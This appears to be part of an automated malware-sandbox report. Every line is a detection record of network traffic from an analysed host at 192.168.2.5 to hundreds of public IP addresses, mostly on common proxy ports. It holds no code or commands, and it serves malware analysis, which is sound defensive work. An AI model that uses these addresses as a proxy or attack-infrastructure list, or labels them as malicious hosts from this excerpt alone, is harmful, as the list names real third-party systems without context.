                Source: unknownNetwork traffic detected: HTTP traffic on port 51474 -> 10010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50663 -> 44499
                Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 16238
                Source: unknownNetwork traffic detected: HTTP traffic on port 51455 -> 8520
                Source: unknownNetwork traffic detected: HTTP traffic on port 51473 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 51528 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 51113
                Source: unknownNetwork traffic detected: HTTP traffic on port 51470 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50780 -> 37445
                Source: unknownNetwork traffic detected: HTTP traffic on port 50759 -> 59991
                Source: unknownNetwork traffic detected: HTTP traffic on port 51529 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51532 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51527 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 51541 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 51485 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51531 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51525 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51550 -> 6087
                Source: unknownNetwork traffic detected: HTTP traffic on port 51526 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51545 -> 1082
                Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 51616
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 16691
                Source: unknownNetwork traffic detected: HTTP traffic on port 51511 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51530 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51546 -> 9400
                Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 61464
                Source: unknownNetwork traffic detected: HTTP traffic on port 51567 -> 5811
                Source: unknownNetwork traffic detected: HTTP traffic on port 5443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 51535 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50950 -> 47585
                Source: unknownNetwork traffic detected: HTTP traffic on port 51569 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51215 -> 41890
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 58507
                Source: unknownNetwork traffic detected: HTTP traffic on port 51289 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 43100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 31653
                Source: unknownNetwork traffic detected: HTTP traffic on port 50872 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 51325
                Source: unknownNetwork traffic detected: HTTP traffic on port 51574 -> 7890
                Source: unknownNetwork traffic detected: HTTP traffic on port 51145 -> 60589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50736 -> 808
                Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 51027 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51015 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 44607
                Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51022 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51628 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 51327 -> 28513
                Source: unknownNetwork traffic detected: HTTP traffic on port 9080 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 51610 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 14398
                Source: unknownNetwork traffic detected: HTTP traffic on port 51131 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 7237
                Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51667 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 51317 -> 2453
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51452
                Source: unknownNetwork traffic detected: HTTP traffic on port 51648 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51649 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51651 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51650 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 51274 -> 38242
                Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51612 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51652 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51219 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51603 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 51474
                Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51638 -> 3000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51703 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50671 -> 6666
                Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51473
                Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 6010
                Source: unknownNetwork traffic detected: HTTP traffic on port 51635 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51639 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51292 -> 57447
                Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51663 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51259 -> 64935
                Source: unknownNetwork traffic detected: HTTP traffic on port 9400 -> 51546
                Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 51655 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51666 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51231 -> 9500
                Source: unknownNetwork traffic detected: HTTP traffic on port 51657 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 61818
                Source: unknownNetwork traffic detected: HTTP traffic on port 51664 -> 61725
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51542
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 51750 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51645 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51682 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51763 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51641 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 1082 -> 51545
                Source: unknownNetwork traffic detected: HTTP traffic on port 5811 -> 51567
                Source: unknownNetwork traffic detected: HTTP traffic on port 51673 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 6087 -> 51550
                Source: unknownNetwork traffic detected: HTTP traffic on port 51808 -> 11096
                Source: unknownNetwork traffic detected: HTTP traffic on port 51700 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51691 -> 38832
                Source: unknownNetwork traffic detected: HTTP traffic on port 51706 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 8989
                Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 8002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51306 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51734 -> 16993
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51226
                Source: unknownNetwork traffic detected: HTTP traffic on port 51365 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 7890 -> 51574
                Source: unknownNetwork traffic detected: HTTP traffic on port 51777 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51173 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 51342 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51694 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51812 -> 57745
                Source: unknownNetwork traffic detected: HTTP traffic on port 51834 -> 55425
                Source: unknownNetwork traffic detected: HTTP traffic on port 51871 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50465 -> 12446
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50343
                Source: unknownNetwork traffic detected: HTTP traffic on port 51821 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51817 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50131
                Source: unknownNetwork traffic detected: HTTP traffic on port 51893 -> 9080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51833 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51835 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 10471
                Source: unknownNetwork traffic detected: HTTP traffic on port 51840 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51337 -> 1981
                Source: unknownNetwork traffic detected: HTTP traffic on port 51887 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51828 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51815 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51772 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51961 -> 8585
                Source: unknownNetwork traffic detected: HTTP traffic on port 51851 -> 8193
                Source: unknownNetwork traffic detected: IP country count 32
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 197.234.13.97:4145
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 154.73.29.1:8080
                Source: global trafficTCP traffic: 192.168.2.5:49713 -> 162.241.158.204:52980
                Source: global trafficTCP traffic: 192.168.2.5:49714 -> 51.222.241.8:36219
                Source: global trafficTCP traffic: 192.168.2.5:49715 -> 177.38.5.42:4153
                Source: global trafficTCP traffic: 192.168.2.5:49716 -> 206.189.145.23:49614
                Source: global trafficTCP traffic: 192.168.2.5:49717 -> 212.102.47.83:8219
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 101.255.165.130:1111
                Source: global trafficTCP traffic: 192.168.2.5:49719 -> 211.174.114.225:4153
                Source: global trafficTCP traffic: 192.168.2.5:49721 -> 1.20.184.75:4153
                Source: global trafficTCP traffic: 192.168.2.5:49722 -> 119.3.215.41:8888
                Source: global trafficTCP traffic: 192.168.2.5:49723 -> 212.237.218.68:3128
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 41.60.232.18:5678
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 197.234.13.27:4145
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 190.97.238.94:999
                Source: global trafficTCP traffic: 192.168.2.5:49725 -> 27.123.1.35:4153
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 187.216.144.170:5678
                Source: global trafficTCP traffic: 192.168.2.5:49728 -> 84.36.23.44:8080
                Source: global trafficTCP traffic: 192.168.2.5:49730 -> 45.65.138.48:999
                Source: global trafficTCP traffic: 192.168.2.5:49731 -> 41.33.203.231:1981
                Source: global trafficTCP traffic: 192.168.2.5:49732 -> 86.206.214.11:1080
                Source: global trafficTCP traffic: 192.168.2.5:49733 -> 186.103.130.94:8080
                Source: global trafficTCP traffic: 192.168.2.5:49734 -> 103.149.194.40:32650
                Source: global trafficTCP traffic: 192.168.2.5:49735 -> 94.131.63.120:58378
                Source: global trafficTCP traffic: 192.168.2.5:49736 -> 186.96.95.205:999
                Source: global trafficTCP traffic: 192.168.2.5:49737 -> 150.230.96.150:19291
                Source: global trafficTCP traffic: 192.168.2.5:49738 -> 209.14.112.3:1080
                Source: global trafficTCP traffic: 192.168.2.5:49739 -> 177.131.29.213:4153
                Source: global trafficTCP traffic: 192.168.2.5:49740 -> 131.100.48.233:999
                Source: global trafficTCP traffic: 192.168.2.5:49742 -> 203.96.177.211:33382
                Source: global trafficTCP traffic: 192.168.2.5:49744 -> 223.113.89.138:1080
                Source: global trafficTCP traffic: 192.168.2.5:49747 -> 103.5.127.213:50806
                Source: global trafficTCP traffic: 192.168.2.5:49748 -> 165.227.196.37:63637
                Source: global trafficTCP traffic: 192.168.2.5:49749 -> 103.178.194.190:1111
                Source: global trafficTCP traffic: 192.168.2.5:49750 -> 61.129.2.212:8080
                Source: global trafficTCP traffic: 192.168.2.5:49751 -> 47.243.177.21:8088
                Source: global trafficTCP traffic: 192.168.2.5:49752 -> 41.65.236.37:1981
                Source: global trafficTCP traffic: 192.168.2.5:49755 -> 51.15.230.100:16379
                Source: global trafficTCP traffic: 192.168.2.5:49756 -> 188.132.222.44:8080
                Source: global trafficTCP traffic: 192.168.2.5:49757 -> 45.230.39.105:999
                Source: global trafficTCP traffic: 192.168.2.5:49758 -> 162.214.170.144:37592
                Source: global trafficTCP traffic: 192.168.2.5:49759 -> 207.180.198.241:37443
                Source: global trafficTCP traffic: 192.168.2.5:49760 -> 38.7.4.89:999
                Source: global trafficTCP traffic: 192.168.2.5:49762 -> 170.233.117.249:4153
                Source: global trafficTCP traffic: 192.168.2.5:49763 -> 178.79.141.38:45263
                Source: global trafficTCP traffic: 192.168.2.5:49764 -> 72.10.160.90:25257
                Source: global trafficTCP traffic: 192.168.2.5:49765 -> 202.154.178.243:5678
                Source: global trafficTCP traffic: 192.168.2.5:49766 -> 107.180.88.173:35774
                Source: global trafficTCP traffic: 192.168.2.5:49769 -> 196.20.125.149:8083
                Source: global trafficTCP traffic: 192.168.2.5:49768 -> 212.83.137.142:44974
                Source: global trafficTCP traffic: 192.168.2.5:49771 -> 103.130.218.135:4002
                Source: global trafficTCP traffic: 192.168.2.5:49772 -> 49.48.126.12:8080
                Source: global trafficTCP traffic: 192.168.2.5:49773 -> 47.176.213.210:39593
                Source: global trafficTCP traffic: 192.168.2.5:49774 -> 105.214.36.255:5678
                Source: global trafficTCP traffic: 192.168.2.5:49776 -> 94.23.220.136:43751
                Source: global trafficTCP traffic: 192.168.2.5:49777 -> 204.199.120.28:999
                Source: global trafficTCP traffic: 192.168.2.5:49778 -> 161.97.163.52:9045
                Source: global trafficTCP traffic: 192.168.2.5:49779 -> 184.170.248.5:4145
                Source: global trafficTCP traffic: 192.168.2.5:49780 -> 200.54.22.74:8080
                Source: global trafficTCP traffic: 192.168.2.5:49781 -> 164.68.107.253:48172
                Source: global trafficTCP traffic: 192.168.2.5:49783 -> 184.170.245.148:4145
                Source: global trafficTCP traffic: 192.168.2.5:49784 -> 91.134.140.160:57320
                Source: global trafficTCP traffic: 192.168.2.5:49785 -> 91.222.198.125:5678
                Source: global trafficTCP traffic: 192.168.2.5:49789 -> 42.61.48.219:8000
                Source: global trafficTCP traffic: 192.168.2.5:49790 -> 103.35.189.217:1080
                Source: global trafficTCP traffic: 192.168.2.5:49791 -> 50.63.12.101:2953
                Source: global trafficTCP traffic: 192.168.2.5:49793 -> 24.249.199.12:4145
                Source: global trafficTCP traffic: 192.168.2.5:49794 -> 51.89.173.40:23854
                Source: global trafficTCP traffic: 192.168.2.5:49795 -> 74.207.241.80:8080
                Source: global trafficTCP traffic: 192.168.2.5:49796 -> 103.194.88.107:32650
                Source: global trafficTCP traffic: 192.168.2.5:49797 -> 119.199.225.148:4145
                Source: global trafficTCP traffic: 192.168.2.5:49798 -> 67.43.236.20:29621
                Source: global trafficTCP traffic: 192.168.2.5:49799 -> 78.128.81.220:31623
                Source: global trafficTCP traffic: 192.168.2.5:49800 -> 186.3.155.25:8080
                Source: global trafficTCP traffic: 192.168.2.5:49802 -> 38.156.73.54:8080
                Source: global trafficTCP traffic: 192.168.2.5:49803 -> 187.193.48.9:8080
                Source: global trafficTCP traffic: 192.168.2.5:49804 -> 43.131.248.165:15673
                Source: global trafficTCP traffic: 192.168.2.5:49805 -> 67.213.210.168:46716
                Source: global trafficTCP traffic: 192.168.2.5:49806 -> 174.77.111.198:49547
                Source: global trafficTCP traffic: 192.168.2.5:49807 -> 190.6.56.133:8080
                Source: global trafficTCP traffic: 192.168.2.5:49808 -> 144.48.111.7:8674
                Source: global trafficTCP traffic: 192.168.2.5:49809 -> 110.78.186.153:4145
                Source: global trafficTCP traffic: 192.168.2.5:49810 -> 209.222.97.30:19481
                Source: global trafficTCP traffic: 192.168.2.5:49811 -> 163.172.144.132:16379
                Source: global trafficTCP traffic: 192.168.2.5:49812 -> 85.214.244.174:3128
                Source: global trafficTCP traffic: 192.168.2.5:49813 -> 194.4.50.127:12334
                Source: global trafficTCP traffic: 192.168.2.5:49814 -> 148.72.206.84:2536
                Source: global trafficTCP traffic: 192.168.2.5:49815 -> 207.180.234.220:42692
                Source: global trafficTCP traffic: 192.168.2.5:49816 -> 45.128.133.1:1080
                Source: global trafficTCP traffic: 192.168.2.5:49817 -> 202.154.18.139:8080
                Source: global trafficTCP traffic: 192.168.2.5:49818 -> 103.87.169.167:32650
                Source: global trafficTCP traffic: 192.168.2.5:49819 -> 45.11.95.165:5044
                Source: global trafficTCP traffic: 192.168.2.5:49820 -> 43.155.130.182:15673
                Source: global trafficTCP traffic: 192.168.2.5:49821 -> 177.93.76.26:4153
                Source: global trafficTCP traffic: 192.168.2.5:49822 -> 120.76.42.209:8888
                Source: global trafficTCP traffic: 192.168.2.5:49823 -> 88.255.102.114:1082
                Source: global trafficTCP traffic: 192.168.2.5:49826 -> 72.10.164.178:20553
                Source: global trafficTCP traffic: 192.168.2.5:49828 -> 181.129.183.19:53281
                Source: global trafficTCP traffic: 192.168.2.5:49829 -> 191.240.153.165:8080
                Source: global trafficTCP traffic: 192.168.2.5:49830 -> 185.108.141.114:8080
                Source: global trafficTCP traffic: 192.168.2.5:49831 -> 164.92.237.188:63722
                Source: global trafficTCP traffic: 192.168.2.5:49832 -> 146.59.70.29:32953
                Source: global trafficTCP traffic: 192.168.2.5:49833 -> 36.91.98.115:8181
                Source: global trafficTCP traffic: 192.168.2.5:49834 -> 117.160.250.134:8899
                Source: global trafficTCP traffic: 192.168.2.5:49835 -> 116.242.89.230:3128
                Source: global trafficTCP traffic: 192.168.2.5:49836 -> 92.204.135.37:32524
                Source: global trafficTCP traffic: 192.168.2.5:49837 -> 121.101.135.46:8089
                Source: global trafficTCP traffic: 192.168.2.5:49839 -> 176.8.230.197:8187
                Source: global trafficTCP traffic: 192.168.2.5:49842 -> 88.80.187.42:3128
                Source: global trafficTCP traffic: 192.168.2.5:49843 -> 47.251.34.170:1080
                Source: global trafficTCP traffic: 192.168.2.5:49844 -> 201.71.3.60:999
                Source: global trafficTCP traffic: 192.168.2.5:49845 -> 159.65.39.234:7732
                Source: global trafficTCP traffic: 192.168.2.5:49846 -> 201.20.94.93:8080
                Source: global trafficTCP traffic: 192.168.2.5:49848 -> 67.43.227.226:12673
                Source: global trafficTCP traffic: 192.168.2.5:49849 -> 195.178.33.86:8080
                Source: global trafficTCP traffic: 192.168.2.5:49850 -> 164.92.86.113:62987
                Source: global trafficTCP traffic: 192.168.2.5:49851 -> 142.54.239.1:4145
                Source: global trafficTCP traffic: 192.168.2.5:49852 -> 111.38.73.92:9002
                Source: global trafficTCP traffic: 192.168.2.5:49854 -> 75.119.145.154:7505
                Source: global trafficTCP traffic: 192.168.2.5:49856 -> 8.213.128.6:3128
                Source: global trafficTCP traffic: 192.168.2.5:49858 -> 178.141.249.246:8081
                Source: global trafficTCP traffic: 192.168.2.5:49859 -> 161.97.147.193:43131
                Source: global trafficTCP traffic: 192.168.2.5:49860 -> 107.180.103.214:61634
                Source: global trafficTCP traffic: 192.168.2.5:49861 -> 12.89.124.138:4145
                Source: global trafficTCP traffic: 192.168.2.5:49862 -> 165.227.104.122:58839
                Source: global trafficTCP traffic: 192.168.2.5:49863 -> 212.112.125.44:45555
                Source: global trafficTCP traffic: 192.168.2.5:49864 -> 103.114.53.2:8080
                Source: global trafficTCP traffic: 192.168.2.5:49865 -> 190.61.48.24:999
                Source: global trafficTCP traffic: 192.168.2.5:49866 -> 94.26.241.120:8080
                Source: global trafficTCP traffic: 192.168.2.5:49867 -> 41.86.46.112:8080
                Source: global trafficTCP traffic: 192.168.2.5:49868 -> 155.185.15.56:3128
                Source: global trafficTCP traffic: 192.168.2.5:49869 -> 2.229.249.153:4145
                Source: global trafficTCP traffic: 192.168.2.5:49870 -> 36.88.140.235:8080
                Source: global trafficTCP traffic: 192.168.2.5:49871 -> 186.215.87.194:6033
                Source: global trafficTCP traffic: 192.168.2.5:49872 -> 185.158.114.14:25697
                Source: global trafficTCP traffic: 192.168.2.5:49873 -> 132.148.245.112:38117
                Source: global trafficTCP traffic: 192.168.2.5:49874 -> 198.12.255.193:6821
                Source: global trafficTCP traffic: 192.168.2.5:49876 -> 195.138.73.54:44017
                Source: global trafficTCP traffic: 192.168.2.5:49878 -> 211.54.26.187:3128
                Source: global trafficTCP traffic: 192.168.2.5:49879 -> 154.205.152.96:9080
                Source: global trafficTCP traffic: 192.168.2.5:49880 -> 162.241.137.197:40604
                Source: global trafficTCP traffic: 192.168.2.5:49882 -> 62.103.66.18:3128
                Source: global trafficTCP traffic: 192.168.2.5:49883 -> 51.68.164.77:54504
                Source: global trafficTCP traffic: 192.168.2.5:49884 -> 37.120.162.180:42370
                Source: global trafficTCP traffic: 192.168.2.5:49886 -> 190.2.115.33:4153
                Source: global trafficTCP traffic: 192.168.2.5:49887 -> 103.171.165.93:8080
                Source: global trafficTCP traffic: 192.168.2.5:49889 -> 41.223.108.13:1080
                Source: global trafficTCP traffic: 192.168.2.5:49890 -> 46.253.143.144:3128
                Source: global trafficTCP traffic: 192.168.2.5:49892 -> 178.49.14.57:3128
                Source: global trafficTCP traffic: 192.168.2.5:49893 -> 168.138.231.177:3128
                Source: global trafficTCP traffic: 192.168.2.5:49894 -> 103.19.10.245:4153
                Source: global trafficTCP traffic: 192.168.2.5:49895 -> 41.70.12.54:5678
                Source: global trafficTCP traffic: 192.168.2.5:49896 -> 103.190.171.137:8080
                Source: global trafficTCP traffic: 192.168.2.5:49897 -> 62.171.169.37:58402
                Source: global trafficTCP traffic: 192.168.2.5:49900 -> 72.195.114.169:4145
                Source: global trafficTCP traffic: 192.168.2.5:49901 -> 163.181.123.54:8080
                Source: global trafficTCP traffic: 192.168.2.5:49902 -> 36.37.180.40:1080
                Source: global trafficTCP traffic: 192.168.2.5:49903 -> 202.137.141.212:5678
                Source: global trafficTCP traffic: 192.168.2.5:49904 -> 140.227.204.70:3128
                Source: global trafficTCP traffic: 192.168.2.5:49905 -> 88.202.230.103:39647
                Source: global trafficTCP traffic: 192.168.2.5:49906 -> 162.214.227.68:60433
                Source: global trafficTCP traffic: 192.168.2.5:49907 -> 103.122.66.140:1111
                Source: global trafficTCP traffic: 192.168.2.5:49908 -> 190.97.238.83:999
                Source: global trafficTCP traffic: 192.168.2.5:49909 -> 189.240.60.171:9090
                Source: global trafficTCP traffic: 192.168.2.5:49910 -> 104.37.135.145:4145
                Source: global trafficTCP traffic: 192.168.2.5:49911 -> 103.56.206.65:4995
                Source: global trafficTCP traffic: 192.168.2.5:49912 -> 195.177.217.131:52858
                Source: global trafficTCP traffic: 192.168.2.5:49913 -> 45.138.87.238:1080
                Source: global trafficTCP traffic: 192.168.2.5:49914 -> 103.111.160.41:5678
                Source: global trafficTCP traffic: 192.168.2.5:49915 -> 188.164.196.31:53276
                Source: global trafficTCP traffic: 192.168.2.5:49917 -> 146.59.18.246:40975
                Source: global trafficTCP traffic: 192.168.2.5:49918 -> 203.202.253.108:5020
                Source: global trafficTCP traffic: 192.168.2.5:49919 -> 200.108.197.2:8080
                Source: global trafficTCP traffic: 192.168.2.5:49920 -> 90.84.229.56:3629
                Source: global trafficTCP traffic: 192.168.2.5:49921 -> 174.77.111.196:4145
                Source: global trafficTCP traffic: 192.168.2.5:49923 -> 185.89.156.130:5678
                Source: global trafficTCP traffic: 192.168.2.5:49924 -> 142.4.7.20:39782
                Source: global trafficTCP traffic: 192.168.2.5:49925 -> 119.8.111.196:1080
                Source: global trafficTCP traffic: 192.168.2.5:49927 -> 186.46.34.20:999
                Source: global trafficTCP traffic: 192.168.2.5:49929 -> 179.43.10.0:8085
                Source: global trafficTCP traffic: 192.168.2.5:49931 -> 154.236.179.235:1981
                Source: global trafficTCP traffic: 192.168.2.5:49932 -> 38.10.179.195:999
                Source: global trafficTCP traffic: 192.168.2.5:49933 -> 184.178.172.5:15303
                Source: global trafficTCP traffic: 192.168.2.5:49934 -> 45.233.170.74:999
                Source: global trafficTCP traffic: 192.168.2.5:49937 -> 188.132.222.23:8080
                Source: global trafficTCP traffic: 192.168.2.5:49938 -> 114.108.177.104:60984
                Source: global trafficTCP traffic: 192.168.2.5:49939 -> 111.90.150.109:1080
                Source: global trafficTCP traffic: 192.168.2.5:49940 -> 51.15.133.214:16379
                Source: global trafficTCP traffic: 192.168.2.5:49941 -> 116.68.162.82:8080
                Source: global trafficTCP traffic: 192.168.2.5:49943 -> 188.165.237.26:52982
                Source: global trafficTCP traffic: 192.168.2.5:49944 -> 103.229.83.106:6789
                Source: global trafficTCP traffic: 192.168.2.5:49945 -> 177.93.44.53:999
                Source: global trafficTCP traffic: 192.168.2.5:49948 -> 197.234.13.52:36902
                Source: global trafficTCP traffic: 192.168.2.5:49949 -> 171.250.222.13:1080
                Source: global trafficTCP traffic: 192.168.2.5:49951 -> 62.171.131.101:37447
                Source: global trafficTCP traffic: 192.168.2.5:49952 -> 103.159.194.241:8080
                Source: global trafficTCP traffic: 192.168.2.5:49953 -> 27.123.3.141:4145
                Source: global trafficTCP traffic: 192.168.2.5:49954 -> 18.134.236.231:3128
                Source: global trafficTCP traffic: 192.168.2.5:49955 -> 104.236.10.83:33447
                Source: global trafficTCP traffic: 192.168.2.5:49957 -> 95.164.89.123:8888
                Source: global trafficTCP traffic: 192.168.2.5:49958 -> 203.188.245.98:52837
                Source: global trafficTCP traffic: 192.168.2.5:49959 -> 50.62.134.139:36916
                Source: global trafficTCP traffic: 192.168.2.5:49960 -> 92.205.110.118:7895
                Source: global trafficTCP traffic: 192.168.2.5:49961 -> 45.4.202.73:999
                Source: global trafficTCP traffic: 192.168.2.5:49962 -> 201.184.159.28:5678
                Source: global trafficTCP traffic: 192.168.2.5:49963 -> 51.158.77.220:16379
                Source: global trafficTCP traffic: 192.168.2.5:49964 -> 162.214.121.11:3549
                Source: global trafficTCP traffic: 192.168.2.5:49965 -> 195.90.216.75:1080
                Source: global trafficTCP traffic: 192.168.2.5:49966 -> 49.156.34.190:24492
                Source: global trafficTCP traffic: 192.168.2.5:49967 -> 14.207.167.114:8080
                Source: global trafficTCP traffic: 192.168.2.5:49968 -> 46.175.4.76:39574
                Source: global trafficTCP traffic: 192.168.2.5:49969 -> 141.98.248.19:3128
                Source: global trafficTCP traffic: 192.168.2.5:49972 -> 20.219.177.85:3129
                Source: global trafficTCP traffic: 192.168.2.5:49974 -> 103.70.159.142:5678
                Source: global trafficTCP traffic: 192.168.2.5:49976 -> 101.133.162.23:8899
                Source: global trafficTCP traffic: 192.168.2.5:49977 -> 194.233.78.142:34471
                Source: global trafficTCP traffic: 192.168.2.5:49978 -> 34.95.243.122:8081
                Source: global trafficTCP traffic: 192.168.2.5:49979 -> 198.105.111.15:6693
                Source: global trafficTCP traffic: 192.168.2.5:49980 -> 46.17.63.166:9091
                Source: global trafficTCP traffic: 192.168.2.5:49981 -> 45.56.83.46:8047
                Source: global trafficTCP traffic: 192.168.2.5:49982 -> 199.85.209.166:29657
                Source: global trafficTCP traffic: 192.168.2.5:49983 -> 103.124.137.150:20
                Source: global trafficTCP traffic: 192.168.2.5:49984 -> 93.158.202.194:50673
                Source: global trafficTCP traffic: 192.168.2.5:49986 -> 45.70.204.233:4145
                Source: global trafficTCP traffic: 192.168.2.5:49987 -> 103.49.114.195:8080
                Source: global trafficTCP traffic: 192.168.2.5:49988 -> 198.89.91.42:5678
                Source: global trafficTCP traffic: 192.168.2.5:49989 -> 117.160.250.163:82
                Source: global trafficTCP traffic: 192.168.2.5:49990 -> 92.205.61.38:48664
                Source: global trafficTCP traffic: 192.168.2.5:49991 -> 185.132.179.72:3128
                Source: global trafficTCP traffic: 192.168.2.5:49992 -> 117.30.118.200:8118
                Source: global trafficTCP traffic: 192.168.2.5:49993 -> 43.132.184.228:8181
                Source: global trafficTCP traffic: 192.168.2.5:49994 -> 36.134.91.82:8888
                Source: global trafficTCP traffic: 192.168.2.5:49995 -> 109.70.189.30:38880
                Source: global trafficTCP traffic: 192.168.2.5:49996 -> 35.79.120.242:3128
